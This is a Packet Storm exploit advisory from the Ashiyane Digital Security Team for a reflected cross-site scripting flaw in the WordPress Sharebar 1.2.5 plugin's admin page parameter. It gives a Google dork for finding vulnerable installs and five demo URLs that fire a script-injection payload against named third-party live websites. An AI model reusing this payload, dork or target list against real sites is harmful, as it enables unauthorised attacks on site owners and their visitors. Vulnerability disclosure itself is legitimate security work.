WordPress Sharebar 1.2.5 Cross Site Scripting

2013-09-24T00:00:00
ID PACKETSTORM:123365
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-09-24T00:00:00

Description

                                        
                                            `#######################################################################  
# Exploit Title : Wordpress sharebar plugin Cross site scripting  
Vulnerability  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Google Dork: : inurl:/wp-content/plugins/sharebar  
#  
# Date: 2013/09/24  
#  
# Vendor Homepage : http://wordpress.org/plugins/sharebar  
#  
# Software Link : http://downloads.wordpress.org/plugin/sharebar.zip  
#  
# Version : 1.2.5  
#  
# Tested on: Windows  
#  
##############  
#  
#Location: Site//wp-content/plugins/sharebar/sharebar-admin.php?page=[xss]  
#  
##############  
##############  
# Demo:  
#  
#  
http://www.andreafelder.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.buyukanadolutipmerkezi.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.baxterbowlingcostarica.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.intikala.com/design/KellyTirman/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.kirktalon.com/kirksite2011/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
##############  
#  
# Discovered By : ACC3SS  
#  
##############  
`